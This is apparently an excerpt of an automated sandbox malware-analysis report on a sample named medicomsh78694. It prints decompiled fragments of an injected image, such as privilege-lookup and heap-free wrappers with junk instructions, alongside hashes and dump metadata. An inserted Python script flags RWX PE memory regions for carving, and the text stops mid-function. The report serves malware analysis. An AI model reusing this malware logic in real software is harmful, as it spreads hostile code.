                                                                            0x004072ee
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x00000000
                                                                            0x0040730d
                                                                            0x00407312

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                            • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                                            • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                            • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 312 418a52-418a7a call 4191f0 315 418a7f-418a94 LookupPrivilegeValueW 312->315
                                                                            C-Code - Quality: 37%
                                                                            			E00418A52(void* __ecx, void* __edx, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                            				WCHAR* _t10;
                                                                            				int _t13;
                                                                            				void* _t21;
                                                                            
                                                                            				asm("les eax, [ebp-0x38fdee29]");
                                                                            				asm("in al, 0xaa");
                                                                            				asm("movsb");
                                                                            				asm("adc [ebp-0x75], dl");
                                                                            				_t10 = _a8;
                                                                            				E004191F0(_t21, _t10, _t10 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                                                            				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                            				return _t13;
			}

                                                                            0x00418a52
                                                                            0x00418a59
                                                                            0x00418a5b
                                                                            0x00418a5f
                                                                            0x00418a63
                                                                            0x00418a7a
                                                                            0x00418a90
                                                                            0x00418a94

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 4809ff46df57bfde1b8a99110cce348b1890b07e9134698f2249d542c0401ed7
                                                                            • Instruction ID: 75f637a98093c9d51762d85ebfb074ceceb1ca9e6372dc950932d0e901eb17cd
                                                                            • Opcode Fuzzy Hash: 4809ff46df57bfde1b8a99110cce348b1890b07e9134698f2249d542c0401ed7
                                                                            • Instruction Fuzzy Hash: AAF0A0B1600248BFDB10DF55DC84EDB3BA8EF89214F148159FD09A7242C635E805CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 316 4188f4-418917 call 4191f0 318 41891c-418931 RtlFreeHeap 316->318
                                                                            C-Code - Quality: 82%
                                                                            			E004188F4(void* __edx, signed int __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                            				char _t12;
                                                                            				signed int _t19;
                                                                            
                                                                            				_t19 = __edi >> 1;
                                                                            				asm("adc esp, [edx-0x1374aa2b]");
                                                                            				_t9 = _a4;
                                                                            				_t3 = _t9 + 0xc74; // 0xc74
                                                                            				E004191F0(_t19, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                            				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                            				return _t12;
                                                                            			}

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: f19674379307aef602e1fa7fc40e611f37f987ab2a5b2df20b2fd9eebc02f8ce
                                                                            • Instruction ID: 7e7d1fc913a5f18de5c1a52c619892727b87da8f20aa61674cc2ff5b96c978a7
                                                                            • Opcode Fuzzy Hash: f19674379307aef602e1fa7fc40e611f37f987ab2a5b2df20b2fd9eebc02f8ce
                                                                            • Instruction Fuzzy Hash: EFE06DB5200645AFD718DF55CC48EE77769EF88310F058689FD185B382D630E914CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 46%
                                                                            			E00418A06(void* __eax, void* __edx, signed int __edi) {
                                                                            				void* __ebp;
                                                                            				int _t12;
                                                                            				void* _t19;
                                                                            				void* _t23;
                                                                            
                                                                            				asm("aas");
                                                                            				asm("out 0x6e, al");
                                                                            				_t19 = __edx + 0xf + __edi * 2;
                                                                            				asm("salc");
                                                                            				E004191F0(_t19, __eax, __eax + 0xc8c,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
                                                                            				_t12 = LookupPrivilegeValueW( *(_t23 + 0xc),  *(_t23 + 0x10),  *(_t23 + 0x14)); // executed
                                                                            				return _t12;
                                                                            			}

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 17cc0dc12bbd5f79c87b69c925ace9ec072e3141f1a7758fecbbd1aec24c85a3
                                                                            • Instruction ID: 66f20162e5ce426f211fae6e64c1f5e530a5f456470759eb6e3002097dd00ffb
                                                                            • Opcode Fuzzy Hash: 17cc0dc12bbd5f79c87b69c925ace9ec072e3141f1a7758fecbbd1aec24c85a3
                                                                            • Instruction Fuzzy Hash: D1E092B22002046FD610EF44CC84EE73359EF84350F118555F90C2B642CA35A955CBF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                            				char _t10;
                                                                            				void* _t15;
                                                                            
                                                                            				_t3 = _a4 + 0xc74; // 0xc74
                                                                            				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                            				return _t10;
                                                                            			}

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                            				intOrPtr _t7;
                                                                            				int _t10;
                                                                            				void* _t15;
                                                                            
                                                                            				_t7 = _a4;
                                                                            				E004191F0(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                            				return _t10;
                                                                            			}

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00418940(intOrPtr _a4, int _a8) {
                                                                            				void* _t10;
                                                                            
                                                                            				_t5 = _a4;
                                                                            				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                            				ExitProcess(_a8);
                                                                            			}

                                                                            APIs
                                                                            • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 37%
                                                                            			E00418934(intOrPtr _a4, int _a8) {
                                                                            				signed char _t9;
                                                                            				void* _t21;
                                                                            				signed char _t23;
                                                                            
                                                                            				asm("pushfd");
                                                                            				_t23 = _t9 ^ 0x00000065;
                                                                            				asm("out 0xb0, eax");
                                                                            				asm("aam 0xde");
                                                                            				_t12 = _a4;
                                                                            				_push(_t23);
                                                                            				E004191F0(_t21, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t12 + 0xa14)), 0, 0x36);
                                                                            				ExitProcess(_a8);
                                                                            			}

                                                                            APIs
                                                                            • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: 6ab88480479560657ba7f379d328492a6c1322b525e08d8001c434104af3978a
                                                                            • Instruction ID: 40104f775c3cf91507469857a9c21bb4e732cd77a213ec3c3656661f3dbd8556
                                                                            • Opcode Fuzzy Hash: 6ab88480479560657ba7f379d328492a6c1322b525e08d8001c434104af3978a
                                                                            • Instruction Fuzzy Hash: A0E026302081916AD701DF788CC5EC63B644F49300F190499E8845B103CA38A755C390
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                            • Instruction ID: 1f30a3687b065379234bda0c5f35f93989b12eaade08a89b8709a41ded5af6ba
                                                                            • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                            • Instruction Fuzzy Hash: 95F0AF21324159ABDB48EF1899D1B6A33D5EB94300F64C0BEA949C7251D6619D408690
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                            • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                            • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                            • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                            • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                            • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                            • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                            • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                            • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                            • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                             • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                            • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                            • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                            • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                             • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                             • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                            • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                            • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                            • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

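The Memory Dump Source entries above all point at the same set of dumps: a region in process 5 whose PE header sits at 00B90000 and whose pages carry protection value 0x40, which the report has flagged as an injected image ("based on PE: true"). The following is an added example, not part of the Joe Sandbox report, that parses those entries and picks out the regions worth carving for static analysis. Two things are assumptions inferred from the names on this page rather than anything the report documents: the dump-name layout `<process>.<phase>.<sequence>.<base>.<protection>.<type>.sdmp`, and that the protection field is the winnt.h page-protection constant (so 0x40 reads as PAGE_EXECUTE_READWRITE). The `REPORT_LINES` input is copied from the block above.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# winnt.h page-protection constants. Only the low byte is decoded; the
# PAGE_GUARD / PAGE_NOCACHE modifier bits above it are masked off.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# ASSUMED dump-name layout, inferred from the names in the report:
#   <process>.<phase>.<sequence>.<base address>.<protection>.<type>.sdmp
# Only base address and protection are interpreted; the other fields are
# carried through as integers with no meaning attached to them.
_SDMP_RE = re.compile(
    r"^(?P<process>\d{8})\.(?P<phase>\d{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\."
    r"(?P<kind>[0-9A-Fa-f]{8})\.sdmp$"
)
_SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)
_ASSOC_RE = re.compile(r"Associated:\s*(?P<name>\S+\.sdmp)")


@dataclass(frozen=True)
class Dump:
    process: int
    phase: int
    seq: int
    base: int
    protect: int
    kind: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE / WRITECOPY, with or without EXECUTE


def parse_sdmp(name: str) -> Optional[Dump]:
    """Decode one dump file name; None if it does not match the assumed layout."""
    m = _SDMP_RE.match(name.strip())
    if not m:
        return None
    return Dump(int(m["process"]), int(m["phase"]), int(m["seq"]),
                int(m["base"], 16), int(m["prot"], 16), int(m["kind"], 16))


@dataclass
class PeRegion:
    source: Dump            # the dump the disassembled function was taken from
    image_base: int         # "Offset" in the report: where the PE header sits
    based_on_pe: bool
    associated: List[Dump]

    def all_dumps(self) -> List[Dump]:
        return [self.source, *self.associated]

    def rwx_dumps(self) -> List[Dump]:
        return [d for d in self.all_dumps() if d.executable and d.writable]

    def span(self) -> Tuple[int, int]:
        bases = [d.base for d in self.all_dumps()]
        return min(bases), max(bases)


def parse_memory_dump_block(lines: Iterable[str]) -> List[PeRegion]:
    """Each 'Source File' line opens a region; the 'Associated' lines that
    follow it belong to that region until the next 'Source File' line."""
    regions: List[PeRegion] = []
    for line in lines:
        m = _SOURCE_RE.search(line)
        if m:
            src = parse_sdmp(m["name"])
            if src is not None:
                regions.append(PeRegion(src, int(m["offset"], 16),
                                        m["pe"].lower() == "true", []))
            continue
        m = _ASSOC_RE.search(line)
        if m and regions:
            d = parse_sdmp(m["name"])
            if d is not None:
                regions[-1].associated.append(d)
    return regions


def carve_candidates(regions: Iterable[PeRegion]) -> List[Tuple[int, int, int, int]]:
    """(process, image base, lowest page, highest page) for every distinct region
    the report marks as a PE and that lives in writable+executable memory: the
    combination expected from process hollowing or a manually mapped image."""
    seen = set()
    out = []
    for r in regions:
        key = (r.source.process, r.image_base)
        if key in seen or not (r.based_on_pe and r.rwx_dumps()):
            continue
        seen.add(key)
        lo, hi = r.span()
        out.append((r.source.process, r.image_base, lo, hi))
    return out


# Input copied from the report block above (the same entry is listed once per function).
REPORT_LINES = [
    "• Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true",
    "• Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp",
    "• Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp",
    "• Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp",
    "• Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp",
    "• Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp",
    "• Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp",
    "• Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp",
]

if __name__ == "__main__":
    for proc, image, lo, hi in carve_candidates(parse_memory_dump_block(REPORT_LINES)):
        print(f"process {proc}: PE at {image:08X}, RWX pages span {lo:08X}-{hi:08X}")
```

The carve list is what you would hand to a dumper: process 5, image base 00B90000, with pages from 00B90000 up to 00D00000 all marked writable and executable. A legitimately loaded DLL would show up as read-only or execute-read image sections, so the RWX-plus-PE combination is the cue that the region was written by the sample rather than mapped by the loader.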
                                                                            C-Code - Quality: 94%
                                                                            			E00BD8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                            				signed int _v8;
                                                                            				short* _v12;
                                                                            				void* _v16;
                                                                            				signed int _v20;
                                                                            				char _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				char _v36;
                                                                            				signed int _v40;
                                                                            				char _v44;
                                                                            				signed int _v48;
                                                                            				signed int _v52;
                                                                            				signed int _v56;
                                                                            				signed int _v60;
                                                                            				char _v68;
                                                                            				void* _t216;
                                                                            				intOrPtr _t231;
                                                                            				short* _t235;
                                                                            				intOrPtr _t257;
                                                                            				short* _t261;
                                                                            				intOrPtr _t284;
                                                                            				intOrPtr _t288;
                                                                            				void* _t314;
                                                                            				signed int _t318;
                                                                            				short* _t319;
                                                                            				intOrPtr _t321;
                                                                            				void* _t328;
                                                                            				void* _t329;
                                                                            				char* _t332;
                                                                            				signed int _t333;
                                                                            				signed int* _t334;
                                                                            				void* _t335;
                                                                            				void* _t338;
                                                                            				void* _t339;
                                                                            
                                                                            				_t328 = __edx;
                                                                            				_t322 = __ecx;
                                                                            				_t318 = 0;
                                                                            				_t334 = _a4;
                                                                            				_v8 = 0;
                                                                            				_v28 = 0;
                                                                            				_v48 = 0;
                                                                            				_v20 = 0;
                                                                            				_v40 = 0;
                                                                            				_v32 = 0;
                                                                            				_v52 = 0;
                                                                            				if(_t334 == 0) {
                                                                             					_t329 = 0xc000000d; // STATUS_INVALID_PARAMETER: no output structure was passed
                                                                            					L49:
                                                                            					_t334[0x11] = _v56;
                                                                            					 *_t334 =  *_t334 | 0x00000800;
                                                                            					_t334[0x12] = _v60;
                                                                            					_t334[0x13] = _v28;
                                                                            					_t334[0x17] = _v20;
                                                                            					_t334[0x16] = _v48;
                                                                            					_t334[0x18] = _v40;
                                                                            					_t334[0x14] = _v32;
                                                                            					_t334[0x15] = _v52;
                                                                            					return _t329;
                                                                            				}
                                                                            				_v56 = 0;
                                                                             				// E00BD8460 is called once per named value and hands back a buffer in _v8 and its size in _v24;
